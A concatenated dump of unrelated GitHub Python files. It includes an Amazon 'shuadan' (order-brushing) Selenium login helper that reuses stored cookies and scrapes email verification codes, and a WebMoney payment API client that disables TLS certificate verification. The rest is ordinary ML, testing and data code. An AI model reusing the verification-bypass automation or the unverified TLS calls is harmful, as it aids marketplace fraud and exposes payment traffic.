Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '浏览器Cookie 设置成功')\r\n return True\r\n else:\r\n L.info('浏览器cookie设置成功')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '浏览器Cookie 设置超时导致失败')\r\n return False\r\n else:\r\n L.error(\"未找到账号%s登录的cookie\" % self.conf.user)\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '浏览器Cookie 设置失败,Cookie没查到')\r\n return False\r\n except:\r\n L.exc('浏览器Cookie设置失败')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '浏览器Cookie 设置失败(请检查操作节点)')\r\n return False\r\n\r\n def check_mail_auth(self):\r\n h1_xp = '//h1[contains(text(), \"Verification needed\")]'\r\n if self.d.get_elem_counts(h1_xp) > 0:\r\n return True\r\n return False\r\n\r\n def send_auth_to_mail(self):\r\n send_xp = '//input[@id=\"continue\"]'\r\n self.d.click_opt(send_xp)\r\n\r\n def get_auth(self):\r\n mail_handler = MailServer(self.conf.user, self.conf.pw,\r\n self.conf.host, self.conf.port)\r\n if mail_handler.conn:\r\n origin_len = mail_handler.email_counts()\r\n L.debug('origin_len:' + origin_len)\r\n mail_handler.close_server()\r\n self.send_auth_to_mail()\r\n for i in range(self.conf.wait_mail):\r\n L.info('剩余时间:%s(s)' % ((self.conf.wait_mail-i)*10))\r\n time.sleep(10)\r\n\r\n mail_handler = MailServer(self.conf.user, self.conf.pw,\r\n self.conf.host, self.conf.port)\r\n if mail_handler.conn:\r\n cur_len = mail_handler.email_counts()\r\n if cur_len - origin_len > 0:\r\n con = mail_handler.parse_mail(cur_len)\r\n authcode = mail_handler.abstract_authcode(con)\r\n mail_handler.close_server()\r\n if authcode:\r\n L.debug('auth code:' + authcode)\r\n return authcode\r\n else:\r\n L.error('验证码提取失败')\r\n else:\r\n L.error('还没获取到新邮件')\r\n else:\r\n L.error('邮箱第%s次链接失败' % (i+1))\r\n else:\r\n L.error('邮箱链接失败')\r\n\r\n def input_auth(self, auth):\r\n h1_xp = '''//h1[contains(text(), \"Verifying it's you\")]'''\r\n ctn_xp = '//input[@aria-labelledby=\"a-autoid-0-announce\"]'\r\n code_xp = '//input[@name=\"code\"]'\r\n if self.d.get_elem_counts(h1_xp) > 0:\r\n self.d.send_key(code_xp, auth)\r\n self.d.click_opt(ctn_xp)\r\n return True\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n 
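    # Sketch of the polling pattern get_auth() is built on (illustrative
    # only; MailServer is this project's mail_auth helper, and `login`
    # stands for a Login instance):
    #
    # baseline = MailServer(user, pw, host, port).email_counts()
    # login.send_auth_to_mail()          # trigger the verification e-mail
    # for _ in range(wait_mail):
    #     time.sleep(10)
    #     handler = MailServer(user, pw, host, port)
    #     if handler.conn and handler.email_counts() > baseline:
    #         auth = handler.abstract_authcode(handler.parse_mail(
    #             handler.email_counts()))
    #         handler.close_server()
    #         break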
pass\r\n\r\n","repo_name":"siladi55/selenium-project","sub_path":"AMZ_shuadan/functions/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38642633674","text":"import pandas as pd\nfrom keras62_split2 import spli\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\nsize = 5\n\nsamsung =pd.read_csv('./data/csv/삼성전자 1120.csv', encoding='CP949', header=0)\nsamsung = samsung.sort_values(['일자'], ascending=['True'])\n\nfor i in range(len(samsung.index)):\n #일자\n samsung.iloc[i,0] = int(samsung.iloc[i,0].replace(\"/\",\"\"))\n #시가\n for j in range(1,17):\n if type(samsung.iloc[i,j]) == type('') and j !=5:\n samsung.iloc[i,j] = float(samsung.iloc[i,j].replace(\",\",\"\"))\n\nbit =pd.read_csv('./data/csv/비트컴퓨터 1120.csv', encoding='CP949')\nbit = bit.sort_values(['일자'], ascending=['True'])\n\nfor i in range(len(bit.index)):\n #일자\n bit.iloc[i,0] = int(bit.iloc[i,0].replace(\"/\",\"\"))\n for j in range(1,17):\n if type(bit.iloc[i,j]) == type('') and j !=5:\n bit.iloc[i,j] = float(bit.iloc[i,j].replace(\",\",\"\"))\n\n\n################################삼성 비트 끝\nkosdak =pd.read_csv('./data/csv/코스닥.csv', encoding='CP949', header=0)\nkosdak = kosdak.sort_values(['일자'], ascending=['True'])\n\nfor i in range(len(kosdak.index)):\n kosdak.iloc[i,0] = int(kosdak.iloc[i,0].replace(\"/\",\"\"))\n for j in range(1,15):\n if type(kosdak.iloc[i,j]) == type('') and j !=5:\n kosdak.iloc[i,j] = float(kosdak.iloc[i,j].replace(\",\",\"\"))\n\n#######삼성, 비트 floateger로 파싱 끝\n\ngold =pd.read_csv('./data/csv/금현물.csv', encoding='CP949', header=0)\ngold = gold.sort_values(['일자'], ascending=['True'])\n\nfor i in range(len(gold.index)):\n gold.iloc[i,0] = int(gold.iloc[i,0].replace(\"/\",\"\"))\n for j in range(1,13):\n if type(gold.iloc[i,j]) == type('') and j !=5:\n if j == 7:\n gold.iloc[i,j] = gold.iloc[i,j].replace(\"%\",\",\")\n gold.iloc[i,j] = float(gold.iloc[i,j].replace(\",\",\"\"))\n else:\n gold.iloc[i,j] = float(gold.iloc[i,j].replace(\",\",\"\"))\n\n\nprint(gold)\nis_samsung = samsung['일자'] > 20180504\nis_bit = bit['일자'] > 20180504\nis_kosdak = kosdak['일자'] >20180508\nis_gold = kosdak['일자'] >20180508\nbit = bit[is_bit]\n\nsamsung = samsung[is_samsung]\nbit = bit[is_bit]\nkosdak = kosdak[is_kosdak]\ngold = gold[is_gold]\n\nis_samsung = samsung['일자'] != 20201120 #20일 빼기\nis_bit = bit['일자'] != 20201120 #20일 빼기\n\nsamsung = samsung[is_samsung]\nbit = bit[is_bit]\n\nprint(samsung.shape) #(625, 17)\nprint(bit.shape) #(625, 17)\nprint(kosdak.shape)# (625, 15)\nprint(gold.shape) # (625, 13)\n\n#### str -> float 완 컬럼 파싱 시작\n\nsamsung = samsung['시가 고가 저가 종가 등락률 개인 기관 외국계'.split()] #8개 컬럼\nbit = bit['시가 고가 저가 종가'.split()] # 4개 컬럼\nkosdak = kosdak['시가 고가 저가 현재가 상승 보합 하락'.split()] #7개 컬럼\ngold = gold['시가 고가 저가 종가 개인 외국인'.split()] #6개 컬럼\n\ny_samsung = samsung.values[5:, 0] #5번 째 이후 시작가 모두 #50200.0\nscaler = MinMaxScaler()\n\nscaler.fit(samsung)\nsamsung = scaler.transform(samsung)\n\nscaler.fit(bit)\nbit = scaler.transform(bit)\n\nscaler.fit(kosdak)\nkosdak = scaler.transform(kosdak)\n\nscaler.fit(gold)\ngold = scaler.transform(gold)\n\nx_samsung =spli(samsung, 5)\nx_bit =spli(bit, 5)\nx_kosdak=spli(kosdak, 5)\nx_gold=spli(gold, 5)\n\nx_samsung = x_samsung.astype('float32')\ny_samsung = y_samsung.astype('float32')\nx_bit = x_bit.astype('float32')\nx_kosdak = x_kosdak.astype('float32')\nx_gold = x_gold.astype('float32')\n\n# print(x_gold[0])\n# print(y_samsung[0])\n# 
print(x_bit[0])\n# print(x_kosdak[0])\n# print(x_gold[0]) 전부 숫자임\n\nnp.save('./homework/samsung_2_startprice/x_samsung.npy', arr= x_samsung)\nnp.save('./homework/samsung_2_startprice/y_samsung.npy', arr= y_samsung)\nnp.save('./homework/samsung_2_startprice/x_bit.npy', arr= x_bit)\nnp.save('./homework/samsung_2_startprice/x_kosdak.npy', arr= x_kosdak)\nnp.save('./homework/samsung_2_startprice/x_gold.npy', arr= x_gold)","repo_name":"Kmmanki/bit_seoul","sub_path":"homework/samsung_2_startprice/samsung_npy_save.py","file_name":"samsung_npy_save.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75006733492","text":"#!/Library/Frameworks/Python.framework/Versions/3.7/bin python3\n\"\"\"\n__project_ = 'Test_Develop'\n__file_name__ = 'TestCal'\n__author__ = 'creamk'\n__time__ = '2020/8/12 20:26'\n__product_name = PyCharm\n# code is far away from bugs with the god animal protecting\n I love animals. They taste delicious.\n ┏┓ ┏┓\n ┏┛┻━━━┛┻┓\n ┃ ┃\n ┃ ┳┛ ┗┳ ┃\n ┃ ┻ ┃\n ┗━┓ ┏━┛\n ┃ ┗━━━┓\n ┃ 神兽保佑 ┣┓\n ┃ 永无BUG! ┏┛\n ┗┓┓ ┏ ━┳┓ ┏┛\n ┃┫┫ ┃┫┫\n ┗┻┛ ┗┻┛\n\"\"\"\nimport allure\nimport pytest\nimport yaml\nimport sys\n\n# sys.path.append(\"..\")\n# print(sys.path)\nfrom python_scripts.third_pytest_scripts_01.Calculator.MyCalculator import Calculator\n\n\ndef get_data(key):\n with open(\"../datas.yml\") as f:\n data = yaml.safe_load(f)\n for data in data[key]:\n yield tuple(data)\n\n\n@allure.feature(\"计算器\")\nclass TestCalculator:\n def setup_class(self):\n self.cal = Calculator()\n print(\"开始计算\")\n\n def teardown_class(self):\n print(\"结束计算\")\n\n @allure.story(\"整数加法\")\n @pytest.mark.parametrize(\n ['a', 'b', 'expect'],\n [data for data in get_data('integer_add')],\n ids=[\n '整数加法_结果1',\n '整数加法_结果2',\n '整数加法_结果3',\n '整数加法_结果4'\n ])\n def test_integer_add(self, a, b, expect):\n with allure.step(\"得到计算结果\"):\n print(\"得到计算结果\")\n result = self.cal.add(a, b)\n with allure.step(\"断言结果\"):\n print(\"断言判断\")\n assert expect == result\n\n @allure.story(\"整数除法\")\n @pytest.mark.parametrize(\n ['a', 'b', 'expect'],\n [data for data in get_data('integer_div')],\n ids=[\n '整数除法_结果1',\n '整数除法_结果2',\n '整数除法_结果3',\n '整数除法_结果4'\n ])\n def test_integer_div(self, a, b, expect):\n result = self.cal.div(a, b)\n assert expect == result\n\n @allure.story(\"小数加法\")\n @pytest.mark.parametrize(\n ['a', 'b', 'expect'],\n [data for data in get_data('float_add')],\n ids=[\n 'float_add_result1',\n 'float_add_result2',\n 'float_add_result3'\n ])\n def test_float_add(self, a, b, expect):\n result = self.cal.add(a, b)\n assert expect == result\n\n @allure.story(\"小数除法\")\n @allure.link(\"https://www.baidu.com\", name=\"百度\")\n @pytest.mark.parametrize(\n ['a', 'b', 'expect'],\n [data for data in get_data('float_div')],\n ids=[\n 'float_div_result1',\n 'float_div_result2',\n 'float_div_result3'\n ])\n def test_float_div(self, a, b, expect):\n result = self.cal.div(a, b)\n assert expect == result\n","repo_name":"creamk87/test_develop","sub_path":"third_pytest_scripts_01/TestCase_Calculator/TestCal.py","file_name":"TestCal.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41714483976","text":"import pandas as pd\ndef merge_data(annotation, phenotypes, out_dir):\n #read in annotation from potentially different sources\n annots = [pd.read_csv(annot, index_col = 0, sep = \"\\t\") for annot in annotation]\n #find samples common to 
all annotation tables\n common_ids = set(annots[0].index.tolist())\n for annot in annots:\n common_ids = common_ids.intersection(set(annot.index.tolist()))\n common_ids = list(common_ids)\n annot_m = pd.concat([annot.loc[common_ids, ] for annot in annots], axis = 1)\n pheno_m = pd.read_csv(phenotypes, index_col = 0, sep = \"\\t\")\n is_in_annot_index = [i in pheno_m.index for i in annot_m.index]\n is_in_pheno_index = [i in annot_m.index for i in pheno_m.index]\n annot_m = annot_m.loc[is_in_annot_index,]\n pheno_m = pheno_m.loc[is_in_pheno_index,]\n #make sure pheno_m uses ? as missing characters\n pheno_m.where(pd.isnull(pheno_m), \"?\")\n #create dummy annotation to description mapping \n anno_map = pd.DataFrame(annot_m.columns, index = annot_m.columns) \n anno_map.columns = [\"description\"]\n anno_map.to_csv(\"{}/annot2desc.txt\".format(out_dir), sep = '\\t')\n #create dummy phenotype to description mapping \n pheno_map = pd.DataFrame(pheno_m.columns, index = pheno_m.columns) \n pheno_map.columns = [\"accession\"] \n pheno_map.to_csv(\"{}/pt2desc.txt\".format(out_dir), sep = '\\t')\n #write phenotypes and feature list to disk\n annot_m.columns.name = \"feats\"\n annot_m.T.to_csv(\"{}/feats.txt\".format(out_dir), columns = [], sep = '\\t')\n pheno_m.columns.name = \"phenotypes\"\n pheno_m.T.to_csv(\"{}/phenotypes.txt\".format(out_dir), columns = [], sep = '\\t')\n \n #create a joint annotation phenotype table\n m = pd.concat([annot_m, pheno_m], axis = 1)\n m.to_csv(\"{}/annot_pheno.dat\".format(out_dir), sep = '\\t')\n m.index.name = \"ids\"\n m.to_csv(\"{}/ids.txt\".format(out_dir), columns = [], sep = '\\t')\n #create dummy ids mapping\n ids_map = pd.DataFrame(m.index, index = m.index) \n ids_map.to_csv(\"{}/ids2name.txt\".format(out_dir), sep = '\\t')\n return pheno_m\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(\"learn antibiotic resistance models\")\n parser.add_argument(\"annotation\", help= 'annotation table', nargs='+')\n parser.add_argument(\"phenotypes\", help= 'phenotype table')\n parser.add_argument(\"out_dir\", help= 'target')\n args = parser.parse_args()\n merge_data(**vars(args))\n","repo_name":"hzi-bifo/Model-T","sub_path":"traitarm/reconstruction/merge_annot_and_pt.py","file_name":"merge_annot_and_pt.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33851813041","text":"import pandas as pd\nimport numpy as np\nimport scipy.stats as stats\nimport utils\n\n\n\ndef process_data(df_train, df_test, deal_nulls = 0, deal_outliers = 0):\n\n target = 'alcopops'\n train = df_train.copy()\n test = df_test.copy()\n\n # impute missings **************************************************************************************************\n # 0: Drop missings\n # 1: Mean or Median depending on distribution\n\n if deal_nulls == 0:\n train.dropna(inplace = True)\n test.replace(np.NaN, train.mean(), inplace = True)\n\n elif deal_nulls == 1:\n # see data distribution\n for column in train.drop(columns = target):\n shapiro_t, pvalue = stats.shapiro(train[column])\n\n if pvalue > 0.05:\n measure = train[column].median()\n else:\n measure = train[column].mean()\n\n train[column].replace(np.NaN, measure, inplace = True)\n test[column].replace(np.NaN, measure, inplace=True)\n\n # impute outliers **************************************************************************************************\n\n exclude = ['gender', 'year_collect', target]\n column_names 
exclude = ['gender', 'year_collect', target]\n    column_names = train.columns\n    columns_to_search = [column for column in column_names if column not in exclude]\n\n    if deal_outliers == 0:\n        pass\n    elif deal_outliers == 1:\n        # winsorizing\n        p1 = 5\n        p2 = 95\n        train = utils.winsoring_smooth(train, columns_to_search, p1, p2)\n    return train, test\n","repo_name":"vmanita/Genetic-Programming-Predictive","sub_path":"02_Code/project_02_regression/scripts/project_02_process.py","file_name":"project_02_process.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"2571148124","text":"import paddle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport paddle.nn.functional as F\nfrom paddle.metric import Accuracy\nfrom paddle.static import InputSpec\n\n\n# train_images = np.zeros((50000, 32, 32, 3), dtype='float32')\n# train_labels = np.zeros((50000, 1), dtype='int32')\n# for i, data in enumerate(train_data):\n#     train_image, train_label = data\n#     train_image = train_image.reshape((3, 32, 32 )).astype('float32') / 255.\n#     train_image = train_image.transpose(2, 1, 0) # putting the (3,32,32) tensor into the (32,32,3) array requires swapping the axes\n#     #train_image = train_image.transpose(1, 2, 0)\n#     train_images[i, :, :, :] = train_image\n#     train_labels[i, 0] = train_label\n# class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n# plt.figure(figsize=(10,10))\n# sample_idxs = np.random.choice(50000, size=25, replace=False) # randomly pick 25 of the 50000 indices (range(0,50000))\n# for i in range(25):\n#     plt.subplot(5, 5, i+1)\n#     plt.xticks([])\n#     plt.yticks([])\n#     plt.imshow(train_images[sample_idxs[i]], cmap=plt.cm.binary)\n#     plt.xlabel(class_names[train_labels[sample_idxs[i]][0]])\n# plt.show()\n\nclass MyNet(paddle.nn.Layer):\n    def __init__(self):\n        super(MyNet, self).__init__()\n\n        self.conv1 = paddle.nn.Conv2D(in_channels=3, out_channels=32, kernel_size=(3, 3))\n        self.pool1 = paddle.nn.MaxPool2D(kernel_size=2, stride=2)\n\n        self.conv2 = paddle.nn.Conv2D(in_channels=32, out_channels=64, kernel_size=(2,2))\n        self.pool2 = paddle.nn.MaxPool2D(kernel_size=2, stride=2)\n\n        self.conv3 = paddle.nn.Conv2D(in_channels=64, out_channels=64, kernel_size=(2,2))\n\n        self.flatten = paddle.nn.Flatten()\n\n        self.linear1 = paddle.nn.Linear(in_features=64*6*6, out_features=64)\n        self.linear2 = paddle.nn.Linear(in_features=64, out_features=10)\n\n    def forward(self, x): #[3,32,32]\n        x = self.conv1(x) #[32,30,30]\n        x = F.relu(x)\n        x = self.pool1(x) #[32,15,15]\n\n        x = self.conv2(x) #[64,14,14]\n        x = F.relu(x)\n        x = self.pool2(x) #[64,7,7]\n\n        x = self.conv3(x) #[64,6,6]\n        x = F.relu(x)\n\n        x = self.flatten(x) #[64*6*6]\n        x = self.linear1(x) #input:64*6*6,output:64\n        x = F.relu(x)\n        x = self.linear2(x) #input:64,output10\n        return x\n\n# define the selfLeNet network; note the base class is Layer, not layer\nclass selfLeNet(paddle.nn.Layer):\n    def __init__(self):\n        super(selfLeNet, self).__init__()\n        self.conv1 = paddle.nn.Conv2D(in_channels=3,out_channels=32,kernel_size=5,stride=1,padding=2)\n        self.max_pool1 = paddle.nn.MaxPool2D(kernel_size=2,stride=2)\n        self.conv2 = paddle.nn.Conv2D(in_channels=32,out_channels=64,kernel_size=5,stride=1)\n        self.max_pool2 = paddle.nn.MaxPool2D(kernel_size=2,stride=2)\n        self.linear1 = paddle.nn.Linear(in_features=64*6*6,out_features=120)\n        self.linear2 = paddle.nn.Linear(in_features=120,out_features=84)\n        self.linear3 = paddle.nn.Linear(in_features=84,out_features=10)\n\n    
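# Added shape check: 32x32 -> conv1(k=5, pad=2) keeps 32x32 -> pool/2 -> 16x16\n    # -> conv2(k=5, no pad) -> 12x12 -> pool/2 -> 6x6, hence linear1's 64*6*6 inputs.\n    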
def forward(self,x): #[3,32,32]\n        x = self.conv1(x) #[32,32,32]\n        x = F.relu(x)\n        x = self.max_pool1(x) #[32,16,16]\n        x = self.conv2(x) #[64,12,12]\n        x = F.relu(x)\n        x = self.max_pool2(x) #[64,6,6]\n        x = paddle.flatten(x,start_axis=1,stop_axis=-1) #[64*6*6]\n        x = self.linear1(x) #input:64*6*6,output:120\n        x = self.linear2(x)\n        x = self.linear3(x)\n        x = F.softmax(x)\n        return x\n\n\n\nif __name__ == '__main__':\n\n    train_data = paddle.vision.datasets.cifar.Cifar10(mode='train')\n    #model = paddle.Model(MyNet())\n    input = InputSpec([None,3,32,32], 'float32', 'image')\n    label = InputSpec([None,1], 'int64', 'label')\n    model = paddle.Model(selfLeNet(),input,label)\n    opt = paddle.optimizer.SGD(learning_rate=0.001,parameters=model.parameters())\n    model.prepare(optimizer=opt,loss=paddle.nn.CrossEntropyLoss(),metrics=Accuracy())\n\n    model.fit(train_data=train_data,epochs=1,batch_size=264,verbose=1)\n\n    model.save('./ouput/cifar',training=True)\n","repo_name":"cournnnnnn/train_test_daily","sub_path":"paddle2/cifar10_pre.py","file_name":"cifar10_pre.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7813153903","text":"# -*- coding: utf-8 -*-\nimport os\nimport ssl\nfrom pprint import pformat\n\nimport xmltodict\nfrom lxml import etree\nfrom requests import Session\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.poolmanager import PoolManager\nfrom wmsigner import Signer\n\n\nclass Ssl3HttpAdapter(HTTPAdapter):\n    \"\"\"Transport adapter that allows us to use SSLv3.\"\"\"\n\n    def init_poolmanager(self, connections, maxsize, block=False):\n        self.poolmanager = PoolManager(\n            num_pools=connections,\n            maxsize=maxsize,\n            block=block,\n            ssl_version=ssl.PROTOCOL_SSLv23\n        )\n\n\nclass AuthInterface(object):\n    \"\"\"Authentication interface.\"\"\"\n\n    def wrap_request(self, request_params):\n        return request_params\n\n    def wrap_body_tree(self, tree):\n        return tree\n\n    def get_url_by_name(self, name):\n        raise NotImplementedError\n\n\nclass WMLightAuthInterface(AuthInterface):\n\n    def __init__(self, pub_cert, priv_key=None):\n        if not os.path.exists(pub_cert):\n            raise ValueError(\"Incorrect path to pub certificate\")\n        if priv_key and not os.path.exists(priv_key):\n            raise ValueError(\"Incorrect path to private key\")\n        self.cert = os.path.abspath(\n            pub_cert) if priv_key is None else (os.path.abspath(pub_cert),\n                                                os.path.abspath(priv_key))\n\n    def wrap_request(self, request_params):\n        request_params.update({\"cert\": self.cert})\n        return request_params\n\n    def get_url_by_name(self, name):\n        if name == \"FindWMPurseNew\":\n            return \"https://w3s.wmtransfer.com/asp/XMLFindWMPurseCertNew.asp\"\n        return \"https://w3s.wmtransfer.com/asp/XML{}Cert.asp\".format(name)\n\n\nclass WMProAuthInterface(AuthInterface):\n    SIGN_STRUCTURE = {\n        \"testwmpurse\": (\"wmid\", \"purse\"),\n        \"getpurses\": (\"wmid\", \"reqn\"),\n        \"invoice\": (\"orderid\", \"customerwmid\", \"storepurse\", \"amount\", \"desc\",\n                    \"address\", \"period\", \"expiration\", \"reqn\"),\n        \"trans\": (\"reqn\", \"tranid\", \"pursesrc\", \"pursedest\", \"amount\",\n                  \"period\", \"pcode\", \"desc\", \"wminvid\"),\n        \"getoperations\": (\"purse\", \"reqn\"),\n        \"getoutinvoices\": (\"purse\", \"reqn\"),\n        \"finishprotect\": (\"wmtranid\", \"pcode\", \"reqn\"),\n        \"message\": (\"receiverwmid\", \"reqn\", \"msgtext\"),\n        \"testsign\": (\"wmid\", \"wmid\", \"plan\", \"sign\"),\n        \"getininvoices\": (\"wmid\", \"wminvid\", \"datestart\", \"datefinish\", \"reqn\")\n    }\n\n    
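# Added note: each tuple lists, in order, the request fields whose concatenated\n    # text values _get_sign() feeds to the WM Classic signer for that interface.\n    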
def __init__(self, wmid, password, keys_file_path):\n        self.wmid = wmid\n        self.signer = Signer(wmid=wmid, keys=keys_file_path, password=password)\n\n    def _get_sign(self, tree):\n        interface_name = tree.findall('.//')[1].tag\n        interface_tag = tree.find(interface_name)\n        sign_params_names = self.SIGN_STRUCTURE[interface_name]\n        return self.signer.sign(''.join([tree.find(param).text\n            if tree.find(param) is not None else interface_tag.find(param).text\n            for param in sign_params_names]))\n\n    def wrap_body_tree(self, tree):\n        wmid = etree.Element('wmid')\n        wmid.text = self.wmid\n        tree.append(wmid)\n        sign = etree.Element('sign')\n        sign.text = self._get_sign(tree)\n        tree.append(sign)\n        return tree\n\n    def get_url_by_name(self, name):\n        if name == \"FindWMPurseNew\":\n            return \"https://w3s.webmoney.ru/asp/XMLFindWMPurseNew.asp\"\n        return \"https://w3s.webmoney.ru/asp/XML{}.asp\".format(name)\n\n\nclass ApiInterface(object):\n    \"\"\"Main API interface.\n\n    Usage example::\n\n        api = ApiInterface(WMLightAuthInterface(\n            \"/home/stas/wmcerts/crt.pem\", \"/home/stas/wmcerts/key.pem\"))\n\n        import time\n        api.x8(purse=\"R328079907035\", reqn=int(time.time()))[\n            \"response\"][\"wmid\"][\"#text\"]\n\n    Proxies the X1 - X10 interfaces to the corresponding attributes.\n    \"\"\"\n\n    API_METADATA = {\n        \"FindWMPurseNew\": {\n            \"root_name\": \"testwmpurse\",\n            \"aliases\": [\"x8\"]\n        },\n        \"Purses\": {\n            \"root_name\": \"getpurses\",\n            \"aliases\": [\"x9\"],\n            \"response_name\": \"purses\"\n        },\n        \"Invoice\": {\n            \"root_name\": \"invoice\",\n            \"aliases\": [\"x1\"]\n        },\n        \"Trans\": {\n            \"root_name\": \"trans\",\n            \"aliases\": [\"x2\"],\n            \"response_name\": \"operation\"\n        },\n        \"Operations\": {\n            \"root_name\": \"getoperations\",\n            \"aliases\": [\"x3\"],\n            \"response_name\": \"operations\"\n        },\n        \"OutInvoices\": {\n            \"root_name\": \"getoutinvoices\",\n            \"aliases\": [\"x4\"],\n            \"response_name\": \"outinvoices\"\n        },\n        \"FinishProtect\": {\n            \"root_name\": \"finishprotect\",\n            \"aliases\": [\"x5\"],\n            \"response_name\": \"operation\"\n        },\n        \"SendMsg\": {\n            \"root_name\": \"message\",\n            \"aliases\": [\"x6\"]},\n        \"ClassicAuth\": {\n            \"root_name\": \"testsign\",\n            \"aliases\": [\"x7\"]\n        },\n        \"InInvoices\": {\n            \"root_name\": \"getininvoices\",\n            \"aliases\": [\"x10\"],\n            \"response_name\": \"ininvoices\"\n        }\n    }\n    
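# Added note: the aliases above let callers write api.x1(...) .. api.x10(...);\n    # __getattribute__ at the bottom of this class resolves them to these keys.\n    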
\"\"\"\n    Metadata for the WebMoney API interfaces.\n    It has the following structure::\n\n    \t{<interface_name>: {\n    \t\t\"root_name\": <root_name>,\n    \t\t\"aliases\": [<alias1>, <alias2>, ...],\n    \t\t\"response_name\": <response_name>\n    \t}}\n\n    The parameters mean the following:\n\n    :param interface_name: Name of the interface in the URL; for X9 (https://w3s.webmoney.ru/asp/XMLPurses.asp), for example, the name is Purses. The name is used when constructing the URL\n    :param root_name: name of the root element of the request data section\n    :param response_name: name of the root element of the response data section (if not set, **root_name** is used)\n\n    \"\"\"\n\n    def __init__(self, authenticationStrategy):\n        self.authStrategy = authenticationStrategy\n\n    def _check_params(self, params):\n        for key in params:\n            assert key in self.API_METADATA\n\n    def _get_root_name_by_interface_name(self, interface_name):\n        assert interface_name in self.API_METADATA, \"Incorrect interface name: %s\" % interface_name\n        return self.API_METADATA[interface_name][\"root_name\"]\n\n    def _create_xml_request_params(self, interface_name, params):\n        \"\"\"\n        Creates the sub-request, which differs for each WM interface\n        :param interface_name: Name of the interface\n        :param params: Dictionary of arguments\n        \"\"\"\n        root_name = self._get_root_name_by_interface_name(interface_name)\n        tree = etree.Element(root_name)\n        for key, value in params.items():\n            subelement = etree.Element(key)\n            subelement.text = value\n            tree.append(subelement)\n\n        return tree\n\n    def _create_request(self, interface, **kwargs):\n        \"\"\"Creates the dictionary of request parameters for the api.\n\n        This is where :func:`AuthInterface.wrap_request` is called.\n        \"\"\"\n        request_params = {\n            \"url\": self.authStrategy.get_url_by_name(interface),\n            \"verify\": False\n        }\n\n        request_params = self.authStrategy.wrap_request(request_params)\n\n        return request_params\n\n    def _create_body(self, interface, **params):\n        \"\"\"Creates the XML body of the request.\n\n        This is where :func:`AuthInterface.wrap_body_tree` is called.\n        \"\"\"\n        tree = etree.Element(\"w3s.request\")\n        reqn = params.pop(\"reqn\", None)\n        _ = etree.Element(\"reqn\")\n        if reqn:\n            _.text = str(int(reqn))\n        else:\n            _.text = \"\"\n        tree.append(_)\n        tree.append(self._create_xml_request_params(interface, params))\n        tree = self.authStrategy.wrap_body_tree(tree)\n        return etree.tostring(tree)\n\n    def _make_request(self, interface, **params):\n        \"\"\"Function that performs the HTTP request to the API.\"\"\"\n        request_params = self._create_request(interface, **params)\n        body = self._create_body(interface, **params)\n        request_params.update({\"data\": body})\n        s = Session()\n        a = Ssl3HttpAdapter(max_retries=3)\n        s.mount('https://', a)\n        response = s.get(**request_params)\n        if response.status_code != 200:\n            raise ValueError(\"Bad response from webmoney api server: ({}) {}\".format(response.status_code, response.text))\n        out = xmltodict.parse(response.text)[\"w3s.response\"]\n        try:\n            response_name = self.API_METADATA[interface].get(\n                \"response_name\", None) or self.API_METADATA[interface][\"root_name\"]\n            resp = out[response_name]\n        except Exception:\n            out = u\"Error while requesting API. 
retval = %s, retdesc = %s\" % (\n out[\"retval\"], out[\"retdesc\"]) + \"\\n\" +\\\n u\"Request data: %s\" % pformat(request_params)\n raise ValueError(out.encode(\"utf-8\"))\n return {\"retval\": out[\"retval\"],\n \"retdesc\": out[\"retdesc\"],\n \"response\": resp}\n\n def __getattribute__(self, name):\n if name in ApiInterface.API_METADATA.keys():\n def _callback(**params):\n return self._make_request(name, **params)\n return _callback\n\n for key, aliases in ApiInterface.API_METADATA.items():\n aliases = aliases[\"aliases\"]\n if name.lower() in aliases:\n def _callback(**params):\n return self._make_request(key, **params)\n return _callback\n return object.__getattribute__(self, name)\n","repo_name":"andruwwwka/webmoney-api-interfaces","sub_path":"webmoney_api_interfaces/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":10242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17186138792","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 20 13:34:28 2019\r\n\r\n@author: kpickrel\r\n\r\nEdge detection OPENCV\r\n\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nimg = cv2.imread('C:\\opencv\\sources\\samples\\python2\\data\\messi.jpg',0)\r\n\r\n\r\n\r\nfor i in range(0,1500,100):\r\n edges = cv2.Canny(img,0,i)\r\n \r\n plt.figure(figsize=(20,10))\r\n plt.subplot(121), plt.imshow(img, cmap = 'gray')\r\n plt.title('Original Image'), plt.xticks([]), plt.yticks([])\r\n \r\n plt.subplot(122), plt.imshow(edges, cmap = 'gray')\r\n plt.title('Edge Image'), plt.xticks([]), 